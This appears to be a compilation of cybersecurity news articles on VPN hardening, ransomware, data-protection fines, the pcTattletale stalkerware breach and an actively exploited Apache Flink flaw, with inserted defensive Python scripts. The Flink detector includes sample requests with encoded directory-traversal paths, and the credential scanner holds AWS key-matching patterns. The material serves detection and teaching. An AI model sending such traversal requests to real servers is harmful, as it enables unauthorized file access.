In case of suspected unauthorized access attempts, Check Point researchers recommend that organizations analyze all remote access connections of local accounts with password-only authentication, review connection logs from the past 3 months, and verify that the user details, time, source IP address, client name, OS name, and application are familiar, based on the configured users and business needs. Check Point has also released a hotfix that prevents users with password-only authentication from connecting to Security Gateways. Once it is installed, local accounts using password-only authentication will be unable to log into the Check Point Remote Access VPN. If any connections or users cannot be validated, invoking the incident response playbook or contacting Check Point Support or a local Check Point representative is advised. The company stated that it has witnessed the compromise of several VPN solutions, including those of various cybersecurity vendors.
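The log review recommended above (password-only local accounts, a three-month window, and checking that user, time, source IP, client and OS are familiar) can be scripted against a baseline of what each account is expected to look like. The following is an added example, not Check Point's VPNcheck script: it assumes a constructed key=value log format rather than Check Point's log schema, made-up accounts, and a hand-maintained baseline of expected source networks and operating systems.

```python
"""Review VPN logins for password-only local accounts against a baseline.

Added example, not Check Point's own VPNcheck script. The log layout below is
a constructed key=value format (not Check Point's log schema), and the
accounts, networks and client names are made up.
"""
import ipaddress
import shlex
from datetime import datetime, timedelta

# Constructed sample log: one certificate login and four password-only logins,
# two of them from networks the account has never used before.
VPN_LOG = """
time=2024-05-20T09:12:44 user=jsmith auth=certificate src=203.0.113.10 client="VPN Client" os=Windows
time=2024-05-21T22:41:03 user=svc-legacy auth=password src=198.51.100.77 client="VPN Client" os=Windows
time=2024-05-22T03:07:19 user=svc-legacy auth=password src=192.0.2.55 client="SSL Portal" os=Linux
time=2024-05-22T10:15:00 user=svc-legacy auth=password src=10.20.0.14 client="VPN Client" os=Windows
time=2024-05-23T11:30:12 user=jsmith auth=password src=203.0.113.10 client="VPN Client" os=Windows
"""

# Baseline an administrator maintains from business knowledge (assumption):
# the networks each local account legitimately connects from and its usual OS.
BASELINE = {
    "jsmith": {"networks": ["203.0.113.0/24"], "os": {"Windows"}},
    "svc-legacy": {"networks": ["10.20.0.0/16"], "os": {"Windows"}},
}
BUSINESS_HOURS = range(7, 20)  # 07:00-19:59, an assumed working window


def parse_line(line):
    """Split one key=value log line into a dict (quoted values allowed)."""
    fields = {}
    for token in shlex.split(line):
        key, _, value = token.partition("=")
        fields[key] = value
    return fields


def review(log_text, since=None):
    """Return one finding per login that deviates from the baseline.

    Password-only logins are always reported: those are the accounts the
    hotfix blocks and that should move to certificate-backed authentication.
    """
    findings = []
    for raw in log_text.strip().splitlines():
        ev = parse_line(raw)
        when = datetime.fromisoformat(ev["time"])
        if since is not None and when < since:
            continue  # outside the review window
        reasons = []
        if ev["auth"] == "password":
            reasons.append("password-only authentication")
        base = BASELINE.get(ev["user"])
        if base is None:
            reasons.append("account not in baseline")
        else:
            src = ipaddress.ip_address(ev["src"])
            if not any(src in ipaddress.ip_network(n) for n in base["networks"]):
                reasons.append(f"unfamiliar source {ev['src']}")
            if ev["os"] not in base["os"]:
                reasons.append(f"unexpected OS {ev['os']}")
        if when.hour not in BUSINESS_HOURS:
            reasons.append("outside business hours")
        if reasons:
            findings.append({"time": ev["time"], "user": ev["user"],
                             "client": ev["client"], "reasons": reasons})
    return findings


def review_window(log_text, as_of, days=90):
    """Run review() over the `days` preceding the ISO date `as_of`."""
    since = datetime.fromisoformat(as_of) - timedelta(days=days)
    return review(log_text, since=since)


def password_only_accounts(log_text):
    """Accounts seen using password-only auth: the candidates to disable or
    to add a certificate to, per the advice above."""
    events = (parse_line(ln) for ln in log_text.strip().splitlines())
    return {ev["user"] for ev in events if ev["auth"] == "password"}


if __name__ == "__main__":
    for f in review_window(VPN_LOG, "2024-05-24"):  # 3-month lookback
        print(f"{f['time']} {f['user']:<11} {f['client']:<11} {'; '.join(f['reasons'])}")
    print("password-only accounts:", sorted(password_only_accounts(VPN_LOG)))
```

The baseline check is the part that turns "verify the familiarity of user details" into something repeatable: a password-only login from an expected network during working hours is a hygiene finding (migrate the account), whereas the same account appearing from an unknown network at 03:00 on a different operating system is the case to hand to the incident response playbook.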

Implementing Check Point VPN Hotfix

Check Point released a script to identify potential risks of compromise in its VPN environment. Enterprises can download the VPNcheck_v2.zip archive file and follow the steps mentioned on the solution page. If the script identifies local accounts with password-only authentication, users can proceed with the installation of the Security Gateway Hotfix as an option. The hotfix is available via the Check Point Upgrade Service Engine (CPUSE) or through manual download. The hotfix adds a new command, blockSFAInternalUsers, to the Security Gateway, allowing admins to block or grant access to internal users with password-only authentication. The default value blocks internal users from connecting with password-only authentication. After the hotfix is installed, attempts to connect using the weak password-only authentication method are blocked and recorded in the security log as failed attempts. As remote operations and online threats rise, organizations must prioritize the implementation of stronger VPN authentication methods while monitoring for unauthorized attempts to access these environments. Failure to do so can lead to compromised network infrastructure or assets, data breaches, and significant financial and reputational damage.

RansomHub Claims Responsibility for Christie’s Cyberattack

By: Alan J
28 May 2024 at 10:17


The notorious ransomware gang RansomHub has claimed responsibility for a recent cyberattack on Christie's auction house, disrupting its website just days before its marquee spring sales and leaking data to back up its claims. The group posted a message on its dark web leak site claiming to have gained access to compromised information about the world's wealthiest art collectors. Christie's officials downplayed the seriousness of the breach, however, and said that no financial or transactional data was compromised in the attack.

RansomHub Claims Cyberattack on Christie's Auction House

The attack, which occurred two weeks ago, brought down Christie's official website, forcing the auction firm to switch to methods such as an alternative domain to reach potential buyers and sellers ahead of its highly anticipated spring sales, after the company announced it would proceed with the sales despite the setback. The sales were scheduled to occur at multiple locations, such as New York and Geneva, and were estimated to fetch 850 million dollars from buyers. The RansomHub ransomware gang has now claimed responsibility for the attack on its leak site, stating that it had compromised about 2GB of data from the auction giant during the initial network compromise. The details were said to include BirthPlace, MRZFull, DocumentNumber, BirthDate, ExpiryDate, FirstName, LastName, IssueDate, IssuingAuthority, DocumentCategory, DocumentType and NationalityName. (Image source: X.com, @AlvieriD) The threat actor group said they had attempted to come to a "reasonable solution," but that Christie's had ceased communications midway and failed to pay the demanded ransom. The threat group shared an alleged sample of the stolen data. (Image source: X.com, @AlvieriD) The hackers warned that Christie's would face heavy fines under the EU's General Data Protection Regulation (GDPR) and reputational damage among its clients. The GDPR mandates that EU companies disclose security incidents that compromise client data, with non-compliance potentially leading to fines of up to $22 million. Cybersecurity experts describe RansomHub as a powerful ransomware group with possible ties to ALPHV, a network of Russian-speaking extortionists.

Christie's Auction House Downplays Data Leak

Christie's acknowledged the cyberattack and the unauthorized access, with spokesman Edward Lewine stating that the auction house is investigating the incident. The preliminary findings indicate that the hackers obtained a limited amount of personal client data but stopped short of compromising financial or transactional records. Christie's CEO Guillaume Cerutti also stated in a recent interview with CNBC that there was no evidence that any transaction or financial data had been impacted or leaked in the incident. The company appeared to downplay the impact of the incident earlier, describing it as a "technology security incident." However, employees privately reported a sense of panic, with limited information shared about the breach by top leaders. Several prominent buyers and sellers also indicated to the New York Times that they were in the dark about the impact, and were not alerted to the hack until a reporter had reached out to them. Lewine stated that the auction house was now in the process of notifying privacy regulators and government agencies, and would also be notifying affected clients shortly. Despite the attack, the spring sales concluded with $528 million in revenue, suggesting the incident did not significantly deter bidding activity. Following the sales, Christie's regained control of its website.

Greek PDPA Fines Ministry of Interior and MEP Asimakopoulou in 'Email-Gate' Scandal

By: Alan J
28 May 2024 at 05:08


The Greek Personal Data Protection Authority (PDPA) has imposed significant fines on the Greek Ministry of Interior and New Democracy MEP Anna-Michelle Asimakopoulou for their roles in violating data protection regulations in the 'email-gate' scandal. The fines come after an investigation into the "email-gate" scandal, in which Asimakopoulou was accused of sending unsolicited emails to Greeks living abroad ahead of the European Parliament elections in June.

Ministry of Interior Violations and Consequences

The authority found that a file of 25,000 voters registered for the June 2023 elections had been leaked between June 8 and 23, 2023. The list, which included voter emails, was sent to New Democracy's then Secretary for Diaspora Affairs, Nikos Theodoropoulos, by an unknown individual. Theodoropoulos forwarded the file to MEP Asimakopoulou, who used it to send mass campaign emails in violation of data protection laws and basic principles of legality. (Image source: Shutterstock, MEP Anna-Michelle Asimakopoulou) On receiving the unsolicited emails to their private accounts, several Greek diaspora voters living abroad expressed their surprise on social media and accused the New Democracy MEP of violating the European Union's General Data Protection Regulation (GDPR). The expats questioned how the MEP had obtained the addresses used in the email campaign. Asimakopoulou earlier attempted to refute allegations of violating these data protection laws but was found to have given contradictory explanations regarding the source from which the addresses had been obtained for use in the mass email campaign. As a result, the Ministry of Interior faces a 400,000-euro fine, while Asimakopoulou faces a 40,000-euro fine. The authority also postponed its verdict on Theodoropoulos and the New Democracy party to examine new claims related to the investigation. The PDPA stated in its investigation that the use of the emails "was in violation of the basic principle of legality, objectivity and transparency of processing, as it was in violation of a series of provisions of the electoral legislation and furthermore could not reasonably be expected." The ministry said it will "thoroughly study" the authority's decision to consider further legal actions.
The "email-gate" scandal has led to significant consequences, including the resignation of the general secretary of the Interior Ministry, Michalis Stavrianoudakis, and the dismissal of Theodoropoulos by New Democracy. Asimakopoulou has announced she will not run in the European Parliament elections. Asimakopoulou is also facing 75 lawsuits by citizens and over 200 lawsuits from the Interior Ministry, over the scandal.

Reaction of Opposition Parties to the Investigation Results

Opposition parties are now demanding the resignation of Interior Minister Niki Kerameos following the outcome of the investigation into the unsolicited emails. (Image source: Shutterstock, Interior Minister Niki Kerameos) The main opposition party SYRIZA released a statement asserting that "private data were being passed around for months among the Interior Ministry, ND, and at least one election candidate," questioning whether the email list had been leaked to other New Democracy candidates by the Interior Ministry. While the Interior Minister might not have been directly involved, SYRIZA claimed that "Kerameos did not have the guts to show up at the Committee on Institutions and Transparency." The Socialist PASOK Party also demanded Kerameos' resignation, adding that the violation shows the government to be "incapable of fulfilling the self-evident, as proven by the high fines."

Pakistan’s Islamabad’s Safe City Authority Online System Down After Hack

By: Alan J
27 May 2024 at 09:37


Islamabad's Safe City Authority experienced a significant disruption when its online system was breached by hackers, prompting an immediate shutdown. The Safe City Islamabad Project, initiated by the PPP-led government and backed by a Chinese government concessional loan, aimed to enhance the capital's surveillance and security capabilities with the installation of 1,950 CCTV cameras, a bomb-proof command center, a 4G communication network, and advanced monitoring systems such as facial recognition technology. This unforeseen event has raised concerns over the security and the vulnerability of the system, as law enforcement officials scramble to assess the damage and restore operations.

Islamabad's Safe City Authority Breach and Initial Response

The breach revealed several systemic weaknesses within the Safe City Authority's digital infrastructure. Hackers successfully infiltrated the primary server, gaining unauthorized access to databases containing criminal records and sensitive information. While the system's firewall did issue an alert upon detecting the intrusion, the absence of backup servers and contingency plans forced a complete shutdown of the affected software and applications. The assault compromised several integral systems, including the Complaint Management System, Criminal Management Record System, and Human Resource Management System, along with software and applications vital to the Operation Division. (Image source: china.aiddata.org) The compromise of these systems impacted several critical services tied to the Safe City initiative, including mobile applications, smart police vehicle records, police station data, video analytics, Islamabad Traffic Police, e-challan systems, and records from the operations division. Approximately 13 to 15 servers provided by the police facilitation center F-6 were also affected. An officer told Dawn, Pakistan's largest English newspaper, that this incident was not a typical hacking scenario involving stolen login credentials. Instead, the system's vulnerability stemmed from the use of simple and common login IDs and passwords by officials, making it easier for hackers to gain access. Additionally, many of the software packages and applications were found to be outdated or running on expired licenses, further compromising the system's security. Despite the breach of several systems, the Safe City cameras' management system, which operated independently through offline direct lines, remained secure, demonstrating the effectiveness of isolated systems in safeguarding against such attacks.
Police spokesperson Taqi Jawad confirmed the intrusion as an attempted breach that triggered the firewall's alarm but stated that appropriate precautionary measures had been taken. "All logins have been closed for the past two days to change them, including those of police stations and officers at various ranks," he stated. Jawad refrained from sharing further specifics on the server shutdowns, saying they were still pending technical feedback.

Controversy Over Islamabad's Safe City Authority

Islamabad's Safe City project has been a source of serious controversy, with several lawsuits over contract transparency and cost inflation leading to the Supreme Court's order to cancel the initial contract with Huawei in 2012. The contract was later renegotiated, and the project resumed under the PMLN (Pakistan Muslim League) government, with the command center becoming operational in 2016. By 2016, 1,805 cameras were installed, and as of 2021, 95% remained functional. Despite the extensive infrastructure, police sources claimed in 2022 that the system had not prevented any incidents or facilitated any arrests, raising questions about its effectiveness. Due to financial strain, Pakistan and China Eximbank signed several debt suspension agreements from July 2020 to December 2021, temporarily suspending principal and interest payments under the concessional loan agreement. Tragically, the project's director was found dead in July 2022 in an apparent suicide. The successful breach of the authority's systems draws additional controversy towards the project, which was intended to be a cornerstone of Islamabad's security infrastructure but has encountered several operational, legal, and financial setbacks.

Federal Court Denies Optus Appeal to Withhold Deloitte Report on 2022 Cyberattack

By: Alan J
27 May 2024 at 07:14


Optus, one of Australia's largest telecommunications companies, has lost a legal battle in the Federal Court. The Australian Federal Court has ordered the company to release an external review performed by Deloitte to investigate the cause of a significant 2022 cyberattack that led to the release of sensitive customer data. The Optus 2022 data breach resulted in the exposure of the names, dates of birth, phone numbers, and email addresses of over 10 million customers with addresses, driver's licence or passport numbers being exposed for a portion of the affected customers.

Optus Appeal Against Sharing External Deloitte Report

The data breach, along with a 14-hour outage of its telecommunication services, frustration over the availability of information and credit monitoring services, and attempts by attackers to exploit the compromised data in SMS phishing attacks, led to intense scrutiny of the company. (Image source: www.optus.com.au/support/cyberresponse) The company commissioned an independent external forensic review of the cyberattack from Deloitte, covering its security systems, controls and processes, on the advice of then CEO Kelly Bayer Rosmarin and with the approval of its board. Bayer Rosmarin made the following statement on the decision:
"This review will help ensure we understand how it occurred and how we can prevent it from occurring again. It will help inform the response to the incident for Optus. This may also help others in the private and public sector where sensitive data is held and risk of cyberattack exists."
Bayer Rosmarin later resigned over the incident, and Optus is now led by a new CEO who is working to rebuild trust with customers in a 'challenging' market. Despite the company's efforts to deal with the data breach, the recent court decision comes after Optus appealed an earlier ruling that it must hand over the report to Slater & Gordon, the law firm pursuing a class action against the company for allegedly failing to protect its customers' personal information. Optus has not yet made a public statement regarding the Federal Court's decision. However, the company had previously argued that the Deloitte report was commissioned to provide legal advice and was therefore privileged. The court decided that Optus had failed to prove that the dominant purpose of the report was legal advice.

Class Action Lawsuit Against Optus and Implications of Court Ruling

Slater & Gordon, the law firm representing the affected Optus customers, has welcomed the court's decision. The law firm's class actions practice group leader, Ben Hardwick, criticized Optus's efforts to keep the report confidential, stating that it indicates the company's refusal to accept responsibility for its role in the data breach and its impact on millions of its customers. In its April 2023 press release, the law firm had stated that more than 100,000 of Optus's current and former customers had registered for the class action, with notable examples among the group including:
  • a domestic violence victim who spent money that was intended for counselling for her children on increasing security measures around the house, including installing video cameras and extra locks on doors and windows
  • a former Optus customer who had previously been burgled and had his identity stolen who now suffers severe anxiety after learning his personal information had been shared online
  • a stalking victim who takes extreme measure to maintain her privacy, especially her address, who fears her life has genuinely been put in danger by the data breach
  • a woman who is now too fearful to answer the telephone after noticing an increase in scam phone calls following the Optus cyberattack, and
  • a retired police officer concerned that his home address may have been shared with criminals he was involved in the prosecution and incarceration of.
The press release also cited the frustration several customers expressed over alleged delays by Optus in providing details of the data breach, and reported inconsistencies in how the telecommunications giant had been treating affected customers. Some Optus registrants claimed to the law firm that they were dismissed when they sought further information from Optus, while others said the company refused to pay for credit monitoring services on the basis that they were no longer Optus customers. "There appears to have been a piecemeal response from Optus, rather than a coordinated approach that made sure everyone whose data was compromised is treated the same." The Federal Court's decision sets a significant precedent for companies involved in data breaches. It underscores the importance of transparency and accountability in such situations, and it may encourage other companies to take stronger measures to protect their customers' personal information.

Amazon Secures pcTattletale Spyware AWS Infrastructure After Hack Reveals 17TB of Data

By: Alan J
27 May 2024 at 05:06


Soon after an independent researcher exposed a vulnerability in the commercial-grade pcTattletale spyware tool that could compromise recordings, the tool’s website was hacked and defaced. The hacker claimed to have accessed at least 17TB of victim screenshots and other sensitive data, viewing the site's hacking as a personal challenge after a researcher's limited disclosure to prevent exploitation of the flaw by bad actors. Amazon promptly placed an official lock on the site's AWS infrastructure following the hacking incident. The pcTattletale spyware's flawed architecture and its discovery demonstrate the inherent vulnerabilities present in common spyware applications, potentially impacting not just individuals but entire organizations and families.

pcTattletale Spyware Vulnerabilities and Poor Data-Handling Practices

The pcTattletale spyware tool offered a live feed of screenshots from the victim's device as its primary feature, alongside typical spyware functionality such as location tracking. However, this extensive monitoring feature, built on poor infrastructure and data-handling practices, has also been its downfall, with data breaches exposing the private data of targets. First, a 2021 data breach demonstrated Insecure Direct Object Reference (IDOR) vulnerabilities in the spyware tool's domain infrastructure, potentially allowing access to sensitive data through guessable Amazon S3 URLs. Last week, researcher Eric Daigle uncovered an API bug that also potentially allowed access to sensitive data across registered devices. This vulnerability allowed unauthorized users to access private information in the form of comprehensive screen recordings. A subsequent hack then exposed pcTattletale's backend to the public, revealing an astonishing disregard for secure practices. The hacker discovered that the spyware shipped with hardcoded AWS credentials, accessible via a hidden webshell, potentially enabling years of undetected data exfiltration. This oversight, remarkable for its simplicity and duration, underscores a major failure in the handling of user data.
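The hardcoded AWS credentials described above are the kind of defect a secret scan in the build pipeline is meant to catch before code ships. The block below is an added example written for this article, not pcTattletale's code or any vendor's tool: the PHP snippet it scans is constructed to show the anti-pattern, and the key values in it are the placeholder examples from AWS documentation rather than real credentials. The regular expressions encode the documented shape of an access key ID (a four-letter prefix such as AKIA followed by 16 uppercase alphanumerics) and the 40-character secret; the assignment syntax they accept is an assumption chosen to cover PHP arrays, JSON and `.env` files.

```python
"""Scan source code for hardcoded AWS credentials.

Added example, not pcTattletale's code or any vendor tool: it demonstrates the
check that would have caught the failure the article describes (AWS credentials
shipped inside application code). The PHP snippet is constructed; the key values
are the placeholder examples from AWS documentation, not real credentials.
"""
import re

# AWS access key IDs are 20 characters: a 4-letter prefix plus 16 uppercase alphanumerics.
AWS_KEY_ID_RE = re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b")

# A 40-character base64-like value assigned to something named 'secret'
# (PHP '=>' arrays, '=' in .env files and ':' in JSON/YAML are accepted).
AWS_SECRET_RE = re.compile(
    r"""(?i)['"]?(?:aws_?secret(?:_access)?_key|secret)['"]?\s*(?:=>|=|:)\s*['"]([A-Za-z0-9/+=]{40})['"]"""
)

# Constructed sample of the anti-pattern: credentials baked into application code.
SAMPLE_PHP = """<?php
// constructed sample of the anti-pattern: credentials baked into application code
$s3 = new S3Client([
    'credentials' => [
        'key'    => 'AKIAIOSFODNN7EXAMPLE',
        'secret' => 'wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY',
    ],
]);
"""


def redact(value):
    """Keep only the ends of a secret so a report can identify it without exposing it."""
    return value[:4] + "..." + value[-4:]


def scan(text):
    """Return findings as dicts with the line number, kind and redacted value."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for m in AWS_KEY_ID_RE.finditer(line):
            findings.append({"line": lineno, "kind": "aws_access_key_id",
                             "redacted": redact(m.group(0))})
        for m in AWS_SECRET_RE.finditer(line):
            findings.append({"line": lineno, "kind": "aws_secret_access_key",
                             "redacted": redact(m.group(1))})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_PHP):
        print(f"line {f['line']}: {f['kind']} {f['redacted']}")
```

A scan like this belongs in a pre-commit hook or CI job that fails the build on any finding; the remediation is to load credentials from the runtime environment or an instance role rather than from source, and to rotate any key that has ever been committed, since a key found in a backend webroot has to be treated as exposed for as long as it was deployed.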

pcTattletale Spyware Latest Hack

The hacker defaced pcTattletale's official site, replacing it with a writeup of the operation and links to compromised data obtained from the site's AWS infrastructure. The volume of data stored by pcTattletale was found to be overwhelming, with the hacker reporting the discovery of over 17 terabytes of victim device screenshots from more than 10,000 devices, some dating back to 2018. Although the released data dump did not include these screenshots, it reportedly contained database dumps, full webroot files for the stalkerware service, and other S3 bucket contents, exposing years of sensitive information. (Image source: archive.org) The breach also uncovered a simple webshell hidden since at least December 2011 in the spyware's backend code. This backdoor allowed arbitrary PHP code execution through the use of cookies, raising questions about its origin: whether it was placed by pcTattletale itself as a backdoor or by a threat actor. The hacker later updated the defaced site to share a video, claiming it showed the pcTattletale founder's attempts to restore the site. It took over 20 hours for the defaced website to be taken down, with pcTattletale's service continuing to send screenshots to the S3 bucket until Amazon officially locked down the spyware service's AWS account. (Image source: ericdaigle.ca) Following the official lockdown of the site's AWS infrastructure, security researcher Eric Daigle expanded his earlier limited disclosure with a step-by-step account of the flaw he had reported. He noted that while the site's attacker exploited an unrelated flaw, it was about equally trivial in its complexity.

Victims Affected by pcTattletale Spyware Data Leak

The pcTattletale data leak is particularly alarming as several organizations employed the tool to monitor employees and clients, exposing confidential information across various sectors, such as banks, law firms, educational institutes, healthcare providers, and even government agencies. Notable instances of victims affected by the data breach, as stated by security researcher maia crimew, who explored the incident and shared data in a blog article, include:
  • Hotels leaking guest information such as personal data and credit card details.
  • Law firms exposing lawyer-client communications and client bank-routing information
  • A bank revealing confidential client data
  • Educational institutes such as schools and childcare centers monitoring employees or students, revealing personal data.
  • Healthcare providers exposing patient information.
  • Palestinian government agency employee monitored.
  • The HR department of a Boeing supplier revealing personal information of employees.
  • Tech companies secretly installing pcTattletale on employee devices suspected of wrongdoing, exposing internal systems and source code.
  • A bug bounty hunter who installed the software for pentesting, then immediately tried to uninstall it.
Concerningly, the spyware was also offered as a way for parents and spouses to keep tabs on their children and partners respectively, potentially exposing this information in the resulting breach. (Image source: maia.crimew.gay) Given the wide range of affected companies and the significant security lapses, security researcher maia crimew noted that pcTattletale could face severe repercussions, possibly leading to a cessation of its operations, as the Federal Trade Commission (FTC) had previously ordered other US stalkerware developers to cease operations following breaches, with pcTattletale's case poised for similar consequences. The widespread misuse and systemic security failures of pcTattletale highlight the dangers inherent in stalkerware software and services, as well as the urgent need for stringent regulatory oversight and robust security measures over these tools to protect the data and privacy of individuals and organizations.

Researcher Indicates pcTattletale Stalkerware Found on US Hotels, Corporate and Law Firm Computers Leaks Recordings

By: Alan J
24 May 2024 at 12:33


An independent researcher claims that the commercial-grade spyware tool pcTattletale was found to leak live screen recordings and screenshots to the internet, making them accessible to anyone and not just the app's intended users. The pcTattletale stalkerware sees wide usage and has been discovered on hotel guest check-in computers, corporate systems and computers used by law firms across the United States. The app promotes itself to parents, spouses or partners and enterprises with the promise of discreet, instant, real-time monitoring and easy installation.

pcTattletale Stalkerware Reportedly Leaks Screen Recordings

The pcTattletale spyware tool primarily focuses on advertising itself towards parents concerned over the social media usage of their children and businesses aiming to monitor employees, claiming to offer a window into the online world of children and disruptions to the daily workflow of employees. The tool is available for installation on both Windows and Android operating systems. While the site claims this tracking is safe, Eric Daigle, an independent security researcher claims to have discovered a flaw in the spyware's API that allows attackers to obtain the most recent screen capture on devices with the tool installed. Reached by the Cyber Express Team, Daigle shed some additional details on the purported vulnerability. The researcher said the tool allows users to sign up on the website, after which they are granted custom .exe or .apk files to install on the target's device. The customized file is hardcoded with the users' credentials, Daigle said, simplifying the installation process to essentially two clicks, with the only real other input the acceptance of permission requests required to successfully capture the screen. After the installation process, the spyware's user can access their accounts on the website to trigger or access screen captures. However, Daigle said the recordings he observed weren't a video file but static screenshots taken a few seconds apart, which are stitched together and played in the form of .GIF file to produce the desired recording of the target. Daigle said many U.S. hotels, corporate computers and at least two law firms appeared to be compromised and vulnerable to the flaw. However, the researcher expressed his desire to keep further details about victims anonymous for privacy purposes, along with details on exploiting the flaw to prevent potential attackers from taking advantage. 
However, the researcher was unclear whether the software had been installed by corporate owners, as advertised as a use case on the pcTattletale website, or by other actors. The researcher highlighted the serious consequences and potential impact of leaking live screen recordings, such as the exposure of sensitive personal information, financial information, or captured passwords. The researcher said he had contacted the spyware vendor about the vulnerability but was ignored. He indicated that he would be ready to do a full write-up of the flaw once it had been patched. The pcTattletale site appeared to be down at the time of publishing this article.

Spyware/Stalkerware Tools Remain a Major Concern

Spyware tools pose serious inherent risks aside from their intended purposes, as they can be exploited to violate the privacy of all kinds of individuals or groups. In 2023, researchers observed a Spanish spyware vendor's tools employing multiple zero-days and n-days in an exploit chain, and delivering the spyware module through one-time links in SMS messages. These tools were used against targets in the United Arab Emirates (UAE). Last month, Apple issued notifications to users in 92 different countries to alert them of mercenary spyware attacks. In the same month, the United States government issued several visa restrictions on individuals identified as being connected to, or profiting from, the use or proliferation of commercial spyware. In its notice, the U.S. government cited its concerns over the use of these apps to facilitate human rights abuses or counter-intelligence efforts as justification for the restrictions. Several of these concerns are also shared by privacy-advocating individuals, groups such as the Coalition Against Stalkerware, and non-profit organizations such as the U.S. National Cybersecurity Alliance. The National Cybersecurity Alliance defines the use of these tools against targets as a form of abuse on its Stay Safe Online website.

CISA Says 4-Year-Old Apache Flink Vulnerability Still Under Active Exploitation

By: Alan J
24 May 2024 at 07:41


The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has recently added a four-year-old security flaw affecting Apache Flink to its Known Exploited Vulnerabilities (KEV) catalog, following evidence of active exploitation. The flaw, tracked as CVE-2020-17519, poses significant risks due to improper access control, allowing unauthorized access to sensitive information.

Researchers Observed Active Exploitation of Apache Flink Vulnerability

CISA describes vulnerabilities such as the Apache Flink Vulnerability which have been added to its Known Exploited Vulnerabilities catalog as "frequent attack vectors for malicious cyber actors" and as posing significant risks to the federal enterprise. The catalog serves as a critical resource for identifying and mitigating vulnerabilities actively in use. CVE-2020-17519 is a critical vulnerability in Apache Flink, an open-source framework for stream-processing and batch-processing. The flaw arises from improper access control in versions 1.11.0, 1.11.1, and 1.11.2 of the framework, potentially enabling remote attackers to access files specific to the local JobManager filesystem through the use of specially crafted directory traversal requests, leading to unauthorized access. While precise details of ongoing campaigns exploiting the Apache Flink Vulnerability remain unclear, the bug has existed for at least four years and has been acknowledged by a project maintainer. The project Apache Flink thread states:
A change introduced in Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process. Access is restricted to files accessible by the JobManager process.
The discovery of the vulnerability was credited to "0rich1" from Ant Security FG Lab, and working exploit code for the vulnerability is available on the public web. In the same year, researchers from Palo Alto Networks observed the vulnerability among the most commonly exploited vulnerabilities of the Winter 2020 period, using information collected between November 2020 and January 2021.

Mitigation Measures and Binding Directives

The Apache Software Foundation addressed this issue in January 2021 with the release of Flink versions 1.11.3 and 1.12.0 to the master branch of the project. Users running affected versions are strongly urged to upgrade to these versions to secure their systems.

CISA has mandated that federal agencies apply the necessary patches by June 13, 2024. This directive operates under the Binding Operational Directive (BOD), which requires Federal Civilian Executive Branch (FCEB) agencies to implement fixes for listings in the Known Exploited Vulnerabilities Catalog to protect agency networks against active threats. Although the directive only applies to FCEB agencies, CISA has urged all organizations to reduce their exposure to cyberattacks by applying the mitigations in the catalog as per vendor instructions, or by discontinuing the use of affected products if mitigations are unavailable.

In 2022, a critical vulnerability discovered in Apache Commons Text potentially granted threat actors access to remote servers. While fixes were soon released for both vulnerabilities, these incidents highlight the importance of timely updates and patches for vulnerabilities present in widely deployed open-source projects, frameworks and components.
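As an added example covering the two sections above (it is not code from Apache Flink, CISA or The Cyber Express), the following Python script shows the two defensive checks a practitioner would want after reading this: a version check against the affected releases the article names, and a scan of web-server access logs for directory-traversal patterns, including percent-encoded and double-encoded forms, which is how traversal requests against an HTTP REST interface typically show up in logs. The log lines and request paths are constructed for the demonstration and do not reproduce any real exploit URL; the log format is assumed to be the Combined Log Format written by common reverse proxies.

```python
"""Detect directory-traversal requests in access logs and check a Flink
version against the CVE-2020-17519 affected range.

Added example for this article, not code from Apache Flink or CISA.
The log lines below are constructed for the demonstration; the request
paths in them are invented and do not reproduce any real exploit URL.
"""
import re
from urllib.parse import unquote

# Releases the article lists as affected; 1.11.3 and 1.12.0 are the fixes.
AFFECTED = {(1, 11, 0), (1, 11, 1), (1, 11, 2)}

# Constructed sample lines in Combined Log Format (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [24/May/2024:07:41:02 +0000] "GET /overview HTTP/1.1" 200 512 "-" "curl/8.0"
10.0.0.9 - - [24/May/2024:07:41:05 +0000] "GET /jobs/..%2F..%2Fconf%2Fapp.yaml HTTP/1.1" 404 0 "-" "python-requests/2.31"
10.0.0.9 - - [24/May/2024:07:41:06 +0000] "GET /jobs/..%252F..%252Fconf%252Fapp.yaml HTTP/1.1" 200 2048 "-" "python-requests/2.31"
10.0.0.7 - - [24/May/2024:07:42:00 +0000] "GET /static/app..js HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)


def fully_decode(path: str, max_rounds: int = 3) -> str:
    """Percent-decode repeatedly until the string stops changing, so that
    double-encoded sequences (%252F -> %2F -> /) are exposed. The round
    cap keeps a pathological input from looping forever."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def has_traversal(path: str) -> bool:
    """True when any decoded path segment is exactly '..' (a parent-directory
    reference); both '/' and '\\' count as separators. A file named
    'app..js' is not flagged because '..' is not a whole segment there."""
    decoded = fully_decode(path.split("?", 1)[0]).replace("\\", "/")
    return any(seg == ".." for seg in decoded.split("/"))


def scan_log(text: str) -> list[dict]:
    """Return one finding per request whose path contains traversal."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a Combined Log Format line; skip it
        if has_traversal(m["path"]):
            findings.append({
                "ip": m["ip"],
                "path": m["path"],
                "decoded": fully_decode(m["path"]),
                "status": int(m["status"]),
            })
    return findings


def parse_version(version: str) -> tuple[int, int, int]:
    """Turn '1.11.2' into (1, 11, 2); extra suffixes beyond patch are ignored."""
    major, minor, patch = (int(x) for x in version.strip().split(".")[:3])
    return major, minor, patch


def is_affected(version: str) -> bool:
    """True for the releases the article names as vulnerable (1.11.0-1.11.2)."""
    return parse_version(version) in AFFECTED


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} status={f['status']} {f['path']} -> {f['decoded']}")
    for v in ("1.11.2", "1.11.3", "1.12.0"):
        print(v, "affected" if is_affected(v) else "not affected")
```

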